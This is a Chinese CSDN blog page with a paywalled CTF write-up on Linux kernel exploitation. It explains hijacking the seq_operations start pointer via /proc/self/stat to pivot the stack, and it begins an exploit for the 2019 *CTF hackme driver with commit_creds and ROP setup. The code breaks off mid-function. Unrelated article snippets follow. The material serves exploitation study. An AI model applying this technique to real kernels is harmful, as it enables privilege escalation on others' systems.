kernel 劫持seq_operations && 利用pt_regs

最新推荐文章于 2024-04-21 11:12:38 发布
最新推荐文章于 2024-04-21 11:12:38 发布
阅读量468 收藏
点赞数
分类专栏: it 文章标签: flask python 后端 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45566993/article/details/124791812
版权
🚀 优质资源分享 🚀学习路线指引(点击解锁)知识定位人群定位🧡 Python实战微信订餐小程序 🧡进阶级本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。💛Python量化交易实战💛入门级手把手带你打造一个易扩展、更安全、效率更高的量化交易系统kernel 劫持seq_operations && 利用pt_regs劫持seq_operations进行栈迁移seq_operations是一个
摘要由CSDN通过智能技术生成

🚀 优质资源分享 🚀

学习路线指引(点击解锁) 知识定位 人群定位
🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。
💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统

kernel 劫持seq_operations && 利用pt_regs

劫持seq_operations进行栈迁移

seq_operations是一个大小为0x20的结构体,在打开/proc/self/stat会申请出来。里面定义了四个函数指针,通过他们可以泄露出内核基地址。

struct seq\_operations {
    void * (*start) (struct seq_file *m, loff\_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff\_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

当我们read一个stat文件时,内核会调用proc_opsproc_read_iter指针

ssize_t seq\_read\_iter(struct kiocb *iocb, struct iov\_iter *iter)
{
    struct seq\_file *m = iocb->ki_filp->private_data;
    //...
    p = m->op->start(m, &m->index);
    //...

即会调用seq_operations->start指针,我们只需覆盖start指针为特定gadget,即可控制程序执行流。

2019 *starctf hackme关闭smap来尝试这种打法

exp1

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int fd;
size\_t heap_base, vmlinux_base, mod_tree, modprobe_path, ko_base, pool_addr;
size\_t vmlinux_base, heap_base, off, commit_creds, prepare_kernel_cred;
size\_t user_cs, user_ss, user_sp, user_rflags;
size\_t raw_vmlinux_base = 0xffffffff81000000;
size\_t rop[0x100] = {0};

struct Heap{
    size\_t index;
    char *data;
    size\_t len;
    size\_t offset;
};

void add(int index, size\_t len, char *data)
{
	struct Heap heap;
	heap.index = index;
	heap.data = data;
	heap.len = len;
	ioctl(fd, 0x30000, &heap);
}

void delete(int index)
{
	struct Heap heap;
	heap.index = index;
	ioctl(fd, 0x30001, &heap);
}

void edit(int index, size\
最低0.47元/天 解锁文章
李自提
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux内核实践之序列文件
bullbat的专栏
03-29 4351
作者:bullbat               seq_file机制提供了标准的例程,使得顺序文件的处理好不费力。小的文件系统中的文件,通常用户层是从头到尾读取的,其内容可能是遍历一些数据项创建的。Seq_file机制容许用最小代价实现此类文件,无论名称如何,但顺序文件是可以进行定为操作的,但其实现不怎么高效。顺序访问,即逐个访问读取数据项,显然是首选的访问模式。某个方面具有优势,通常会在
cnn_stories&&dailymail_stories.7z
07-16
在"CNN_stories"和"Dailymail_stories"数据集上,研究人员已经开发出了许多先进的模型,如基于深度学习的Seq2Seq模型、Transformer模型以及最近的预训练模型如BERT和T5等。 总的来说,"CNN_stories"和"Dailymail_...
Linux中pt_regs结构体
weixin_33788244的博客
11-06 743
该系统调用所需要的参数pt_regs在include/asm-i386/ptrace.h文件中定义:struct pt_regs {long ebx;                  //可执行文件路径的指针(regs.ebx中long ecx;                  //命令行参数的指针(regs.ecx中)long edx;                  //环境变量的指针(...
判断linux系统调用是否使用struct pt_regs*传参的方法
最新发布
xuyun0565的专栏
04-21 141
为了让代码自适应这种接口的变化,通过hook close系统调用来判断系统调用使用哪种传参方式,判断的原理是这样的,close函数对应的参数只有一个,使用my_sys_close替换syscall_table中的sys_close。close传参值是个int,而pt_regs是一个指针,在64位系统下一个是4个字节,一个是8个字节,同时pt_regs是个内核指针,有效值是个远超int的范围,因此通过值大小可以判断close使用哪种方法传值。
pt_regs结构
helloworlddm的博客
08-06 6874
struct pt_regs { long ebx;                  //可执行文件路径的指针(regs.ebx中 long ecx;                  //命令行参数的指针(regs.ecx中) long edx;                  //环境变量的指针(regs.edx中)。 long esi; long edi; long ebp;
Linux 进程管理之内核栈和struct pt_regs
小立仔
09-07 2004
Linux 进程管理之内核栈和struct pt_regs简介
seq_file机制
harvey2008的专栏
11-25 898
seq_file机制 在老版本的Linux内核中,proc文件系统有一个缺陷:如果输出内容大于1个内存页,需要多次读,因此处理起来很难。另外,如果输出内容太大,速度会比较慢。在2.6内核中,由于大量使用了seq_file功能,使得内核输出大文件信息更容易。使用seq_file需要包含头文件linux/seq_file.h,并定义一个seq_operations结构: struct seq_op
seq_info.rar_*seq_info_SEQ_INFO
09-19
1. 事件队列管理:seq_info.c可能包含对Sequencer事件队列的管理和查询功能,如添加、删除和查询事件,以及队列的当前容量和利用率。 2. MIDI端口操作:源代码可能会有处理MIDI端口注册、连接和断开的函数,这些...
seq_list.rar_seq_list_seqlist数据结构_seq线性表_顺序表的list类
09-24
"seq_list.rar" 是一个压缩包,包含关于序列数据结构——seq_list的相关实现和测试。在这个上下文中,`seq_list` 可能是一个特定实现的顺序表(顺序线性表),它是一个在内存中连续存储元素的集合。 顺序表是数据...
seq2seq样例.rar_seq2seq_tensorflow_熵 预测
09-23
在本文中,我们将深入探讨序列到序列(Seq2Seq)模型在TensorFlow框架中的实现,以及如何使用交叉熵(Entropy)进行预测。Seq2Seq模型是深度学习领域中用于处理时序数据,如自然语言翻译、语音识别和文本生成等任务...
seq2seq_tutorial_torch.rar_Torch tutorial_seq2seq_torch_英文到数字的转化
09-21
在本教程中,我们将深入探讨如何使用Torch库实现序列到序列(Seq2Seq)模型,这是一种在自然语言处理(NLP)任务中常见的深度学习架构,尤其适用于机器翻译、文本摘要等任务。在这个特定的例子中,我们关注的是将...
linux struct pt_regs结构体
weixin_42296411的博客
03-29 307
【代码】linux struct pt_reg结构体。
求大佬解释下ptrace的pt_regs的定义,而且分为i386 arm x86和aarch64的不同分支
d_o_n_g2的博客
08-17 4543
下个linux kernel,通常在arch/xxx/include下有ptrace.h(通常是,但不总是,找不到时不妨grep下),里面有相应结构的定义 收起回复 2楼 2017-08-12 11:41 举报 |个人企业举报垃圾信息举报 futureIDE: 我有看过asm/ptrace.h
内核proc文件系统与seq接口
dailinqing1984的博客
05-21 740
由于procfs的默认操作函数只使用一页的缓存,在处理较大的proc文件时就有点麻烦,并且在输出一系列结构体中的数据时也比较不灵活,需要自己在read_proc函数中实现迭代,容易出现Bug。所以内核黑客们对一些/proc代码做了研究,抽象出共性,最终形成了seq_file(Sequence file:序列文件)接口。 这个接口提供了一套简单的函数来解决以上proc接口编程时存在的问题,使得编程更
linux驱动17:/proc文件系统(调试技术)
dongyoubin的博客
04-17 1077
/proc文件系统是一种特殊的、由软件创建的文件系统,内核使用它向外界导出信息。/proc下面的每个文件都绑定于一个内核函数,用户读取其中的文件时,该函数动态地生成文件的“内容”。/proc文件支持读写,大多数情况下/proc文件是只读的。使用时包含<linux/proc_fs.h>。 seq_file接口 为大的内核虚拟文件提供一组简单的函数。使用时包含<linux/seq_file.h>,必须建立四个迭代器。 start、next、show、stop(顺序操作,四个迭代器)
do_fork实现--下
半月旋空
02-19 1162
昨天在do_fork实现–上中学习了do_fork创建的前半段,今天我们接着继续分析copy_Process函数 分析了copy_fs, copy_files, copy_signal, copy_sighand, copy_mm,今天接着分析copy_thread, copy_thread是和架构相关的,需要到具体的ARCH目录下去看 在分析copy_thread之前,我们先看几个知识...
Linux进程的数据结构
PnJgHT的博客
12-09 748
在用户态,应用程序进行了至少一次函数调用。32位和64的传递参数的方式稍有不同,32位的就是用函数栈,64位的前6个参数用寄存器,其他的用函数栈。在内核态,32位和64位都使用内核栈,格式也稍有不同,主要集中在pt_regs结构上。在内核态,32位和64位的内核栈和task_struct的关联关系不同。32位主要靠thread_info, 64位主要靠Per-CPU变量。
Kernel pwn 入门 (3)
CoLin的pwn小屋
07-08 1719
kernel pwn 入门之 ret2dir
TRANSACTION_HEADER_ID & TRANSACTION_BATCH_ID & TRANSACTION_BATCH_SEQ
06-09
其中,TRANSACTION_HEADER_ID是账务交易头的唯一标识,TRANSACTION_BATCH_ID是账务交易批次的唯一标识,而TRANSACTION_BATCH_SEQ则是账务交易批次中交易的序列号。这些字段在进行账务处理和查询时都会被使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值